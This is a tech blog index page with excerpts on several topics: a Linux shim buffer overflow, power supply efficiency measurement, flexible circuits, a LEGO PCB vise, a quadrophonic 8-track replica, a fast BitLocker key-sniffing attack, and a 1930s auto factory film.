This Week In Security: Broken Shims, LassPass, And Toothbrushes?

February 9, 2024 by 8 Comments

Linux has a shim problem. Which naturally leads to a reasonable question: What’s a shim, and why do we need it? The answer: Making Linux work wit Secure Boot, and an unintended quirk of the GPLv3.

Secure Boot is the verification scheme in modern machines that guarantees that only a trusted OS can boot. When Secure Boot was first introduced, many Linux fans suggested it was little more than an attempt to keep Linux distros off of consumer’s machines. That fear seems to have been unwarranted, as Microsoft has dutifully kept the Linux Shim signed, so we can all run Linux distros on our Secure Boot machines.

So the shim. It’s essentially a first-stage bootloader, that can boot a signed GRUB2 or other target. You might ask, why can’t we just ask Microsoft to sign GRUB2 directly? And that’s where the GPLv3 comes in. That license has an “anti-tivoization” section, which specifies “Installation Information” as part of what must be provided as part of GPLv3 compliance. And Microsoft’s legal team understands that requirement to apply to even this signing process. And it would totally defeat the point of Secure Boot to release the keys, so no GPLv3 code gets signed. Instead, we get the shim.

Now that we understand the shim, let’s cover how it’s broken. The most serious vulnerability is a buffer overflow in the HTTP file transfer code. The buffer is allocated based on the size in the HTTP header, but a malicious HTTP server can set that value incorrectly, and the shim code would happily write the real HTTP contents past the end of that buffer, leading to arbitrary code execution. You might ask, why in the world does the shim have HTTP code in it at all? The simple answer is to support UEFI HTTP Boot, a replacement for PXE boot.

The good news is that this vulnerability can only be triggered when using HTTP boot, and only by connecting to a malicious server or via a man-in-the-middle attack. With this in mind, it’s odd that this vulnerability is rated a 9.8. Specifically, it seems incorrect that this bug is rated low complexity, or a general network attack vector. In Red Hat’s own write-up of the vulnerability, they argue that the exploitation is high complexity, and is only possible from an adjacent network. There were a handful of lesser vulnerabilities found, and these were all fixed with shim 15.8. Continue reading “This Week In Security: Broken Shims, LassPass, And Toothbrushes?”

Power Supply Efficiency Measurements

February 9, 2024 by 12 Comments

Even if you don’t have a Rohde Schwarz oscilloscope, you can still enjoy their recent video about using an oscilloscope to measure power supply efficiency. Of course, you don’t have to have a scope to do this. You can use a voltmeter and an ammeter, but it is very straightforward if you have a four-channel scope with a pair of current probes.

Of course, if you can measure the voltage and the current at the input, you can calculate the input power. Then again, most scopes these days can do the math for you. Then, you make the same measurement and calculation at the output. If you know the input and output power, you can calculate a percentage or many scopes can do it for you now.

Continue reading “Power Supply Efficiency Measurements”

Friendly Flexible Circuits: The Cables

February 7, 2024 by 18 Comments

Flexible cables and flex PCBs are wonderful. You could choose to carefully make a cable bundle out of ten wires and try to squish them to have a thin footprint – or you could put an FFC connector onto your board and save yourself a world of trouble. If you want to have a lot of components within a cramped non-flat area, you could carefully design a multitude of stuff FR4 boards and connect them together – or you could make an FPC.

Flexible cables in particular can be pretty wonderful for all sorts of moving parts. They transfer power and data to the scanner head in your flat-bed scanner, for instance.  But they’re in fixed parts too.  If you have a laptop or a widescreen TV, chances are, there’s an flexible cable connecting the motherboard with one or multiple daughterboards – or even a custom-made flexible PCB. Remember all the cool keypad and phones we used to have, the ones that would have the keyboard fold out or slide out, or even folding Nokia phones that had two screens and did cool things with those? All thanks to flexible circuits! Let’s learn a little more about what we’re working with here.

FFC and FPC, how are these two different? FFC (Flexible Flat Cable) is a pre-made cable. You’ve typically seen them as white plastic cables with blue pieces on both ends, they’re found in a large number of devices that you could disassemble, and many things use them, like the Raspberry Pi Camera. They are pretty simple to produce – all in all, they’re just flat straight conductors packaged nicely into a very thin cable, and that’s why you can buy them pre-made in tons of different pin pitches and sizes. If you need one board to interface with another board, putting an FFC connector on your board is a pretty good idea.

Continue reading “Friendly Flexible Circuits: The Cables”

Harbor Freight And LEGO PCB Vise Is Cheap And Effective

February 7, 2024 by 6 Comments

It doesn’t take much chasing things around the bench with a soldering iron to appreciate the value of good work holding. And don’t get us started on those cheap “helping hands” alligator clip thingies; they’re somehow worse than no work holding. Isn’t there a better way?

Maybe, judging by [Paul Bryson]’s idea for a dirt cheap PCB vise. It’s a pretty clever design that’ll have you heading to Harbor Freight, or whatever the moral equivalent is in your location, where you’ll pick up a small ratcheting bar clamp. [Paul] used a 4″ (10 cm) clamp; that which looks fine for a wide range of boards, but we suppose you could go bigger if you like. You could also stop there and just clamp your PCBs in the plastic jaws, but [Paul] adorned the jaws with swiveling arms made from LEGO Technic pieces, of all things. Rubber grommets slipped onto Technic pegs go into the holes on the beam to hold the PCB edges firmly, while the swiveling action adapts to odd-shaped boards.

To our mind, the biggest advantage to this design other than cost is how low it holds the PCB — a decided advantage while working under the microscope. Don’t have any Technics parts close to hand? No worries, 3D printed parts could easily stand in, and maybe even improve the design. [Paul] also shows off a substitute for the Technics beam rendered in PCB material, which would reduce the height of the workpiece over the bench even more.

We’ve seen a lot of PCB vises come and go, using everything from scrap wood to 3D printed compliant mechanisms. But we doubt you’ll find anything more cost-effective than [Paul]’s design.

Recreating The Quadrophonic Sound Of The 70s

February 6, 2024 by 23 Comments

For plenty of media center PCs, home theaters, and people with a simple TV and a decent audio system, the standard speaker setup now is 5.1 surround sound. Left and right speakers in the front and back, with a center speaker and a subwoofer. But the 5.1 setup wasn’t always the standard (and still isn’t the only standard); after stereo was adopted mid-century, audio engineers wanted more than just two channels and briefly attempted a four-channel system called quadrophonic sound. There’s still some media from the 70s that can be found that is built for this system, such as [Alan]’s collection of 8-track tapes. These tapes are getting along in years, so he built a quadrophonic 8-track replica to keep the experience alive.

The first thing needed for a replica system like this is digital quadrophonic audio files themselves. Since the format died in the late 70s, there’s not a lot available in modern times so [Alan] has a dedicated 8-track player connected to a four-channel audio-to-USB device to digitize his own collection of quadrophonic 8-track tapes. This process is destructive for the decades-old tapes so it is very much necessary.

With the audio files captured, he now needs something to play them back with. A Raspberry Pi is put to the task, but it needs a special sound card in order to play back the four channels simultaneously. To preserve the feel of an antique 8-track player he’s cannibalized parts from three broken players to keep the cassette loading mechanism and track indicator display along with four VU meters for each of the channels. A QR code reader inside the device reads a QR code on the replica 8-track cassettes when they are inserted which prompts the Pi to play the correct audio file, and a series of buttons along with a screen on the front can be used to fast forward, rewind and pause. A solenoid inside the device preserves the “clunk” sound typical of real 8-track players.

As a replica, this player goes to great lengths to preserve the essence of not only the 8-track era, but the brief quadrophonic frenzy of the early and mid 70s. There’s not a lot of activity around quadrophonic sound anymore, but 8-tracks are popular targets for builds and restorations, and a few that go beyond audio including this project that uses one for computer memory instead.

Continue reading “Recreating The Quadrophonic Sound Of The 70s”

Beating Bitlocker In 43 Seconds

February 6, 2024 by 69 Comments

How long does it take to steal your Bitlocker keys? Try 43 seconds, using less than $10 in hardware. Encrypting your hard drive is good security. If you’re running Windows, the most popular system is BitLocker, which has come with Windows since Vista. We’ve known for some time that Bitlocker could be defeated with direct access to the hardware. Microsoft claims that the process requires an attacker with skill and lengthy access to the hardware. [Stacksmashing] wanted to define lengthy, so he gave it a try. The result is a shockingly fast attack.

Anyone who uses Windows has probably run into Bitlocker. Your hard drive is encrypted, and Bitlocker runs silently in the background, decrypting data on demand.  The problem is key storage. In a simplified sense, encryption keys are stored in the Trusted Platform Module (TPM). When your computer boots, it reads the key from the TPM over the LPC (low pin count) bus, which is one of the last remnants of the original ISA bus.

Continue reading “Beating Bitlocker In 43 Seconds”

Retrotechtacular: The Master Hands Of The Early Automotive Industry

February 6, 2024 by 15 Comments

When motion pictures came along as a major medium in the 1920s or so, it didn’t take long for corporations to recognize their power and start producing promotional pieces. A lot of them are of the “march of progress” genre, featuring swarms of workers happy in their labors and creating the future with their bare hands. If we’re being honest, a lot of it is hard to watch, but “Master Hands,” which shows the creation of cars in the 1930s, is somehow more palatable, mostly because it’s mercifully free of the flowery narration that usually accompanies such flicks.

“Master Hands” was produced in 1936 and focuses on the incredibly labor-intensive process of turning out cars, which appear to be the Chevrolet Master Deluxe, likely the 1937 model year thanks to its independent front suspension. The film is set at General Motors’ Flint Assembly plant in Flint, Michigan, and shows the entire manufacturing process from start to finish. And by start, we mean start; the film begins with the meticulous work of master toolmakers creating the dies and molds needed for forging and casting every part of the car. The mold makers and foundrymen come next, lighting their massive furnaces and packing the countless sand molds needed for casting parts. Gigantic presses stamp out everything from wheels to frame rails to body panels, before everything comes together at the end of the line in a delicate ballet of steel and men.

Continue reading “Retrotechtacular: The Master Hands Of The Early Automotive Industry”